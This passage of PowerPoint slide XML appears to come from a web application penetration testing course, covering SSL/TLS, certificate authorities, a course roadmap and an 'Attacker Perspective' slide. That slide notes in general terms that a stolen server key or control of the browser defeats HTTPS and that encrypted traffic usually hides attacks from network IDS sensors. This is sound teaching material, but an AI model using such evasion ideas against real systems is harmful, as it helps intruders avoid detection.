            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>TLS adds more options for encryption and hashing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Including using two different hashing methods to lower the chance of hash collision</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Usually just referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>SSL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2400">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> regardless of whether it is TLS or SSL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1600">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>TLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1600">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> only used when more verbal precision is needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Secures the transport of requests and responses as they move across the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Relies on the trust placed with Certifying Authorities (CA)</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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Certificate Trusts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96259" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="6519863" y="4746625"/>
            <a:ext cx="1020762" cy="265113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Web Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96260" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="7696200" y="4221163"/>
            <a:ext cx="1447800" cy="106997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600" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Server owner generates a Certificate Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96261" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="838200" y="4724400"/>
            <a:ext cx="1157288" cy="265113"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Web Browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186377" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="4754562"/>
            <a:ext cx="1600200" cy="1570038"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Because the web server's key is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:noFill/>
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>signed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:ea typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>by a trusted CA, the identity of the server is trusted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96263" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3433763" y="3001963"/>
            <a:ext cx="1647825" cy="265112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg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Certificate Authority</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96264" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5257800" y="2087563"/>
            <a:ext cx="2133600" cy="107791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spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>CA generates SSL/TLS certificate based on verification of the server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96265" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7543800" y="3840163"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96266" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="2316163"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="96267" name="Straight Connector 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4959350" y="2943225"/>
            <a:ext cx="1593850" cy="1125538"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="96268" name="Straight Connector 16"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="4525963"/>
            <a:ext cx="4343400" cy="1587"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="lg"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96269" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="5059363"/>
            <a:ext cx="381000" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC00"/>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9627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3886200"/>
            <a:ext cx="609600" cy="871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6271"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2400" y="2133600"/>
            <a:ext cx="609600" cy="871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6272"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3886200"/>
            <a:ext cx="609600" cy="871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dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTPS: Attacker Perspective</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97283" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTPS prevents us from listening in or manipulating requests and responses as they pass by on the network</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>But control either side (browser or server) and we can</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Decrypt variables using key stolen from server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Alter variables at browser before they are sent across SSL connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTPS also hides our attacks from network-based IDS sensors, usually</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Unless sensors are configured with web servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>' certificates and perform on-the-fly decryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is unusual, because of its performance implications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41"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="152400"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="8458200" cy="41148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Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>'s View, Pen-</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Testing, &amp; Scoping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 Cont.</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Capture the Flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="5194300" y="152400"/>
            <a:ext cx="520700" cy="6248400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 328"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 328"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 328"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 328"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 328 w 328"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="328" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="1445"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="109" y="963"/>
                  <a:pt x="219" y="482"/>
                  <a:pt x="328" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="328" y="3984"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="219" y="3105"/>
                  <a:pt x="109" y="2324"/>
                  <a:pt x="0" y="1445"/>
                </a:cubicBez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
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="152400"/>
            <a:ext cx="3276600" cy="6705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eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" i="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web App Pen Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Web Site Server Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> The HTTP Protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> HTTP Methods</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTTP Status Codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WebSockets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Examining HTTP</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>    Requests and Responses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Exercise: Client Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Grande" charset="0"/>
              <a:buChar char="➢"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Session Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
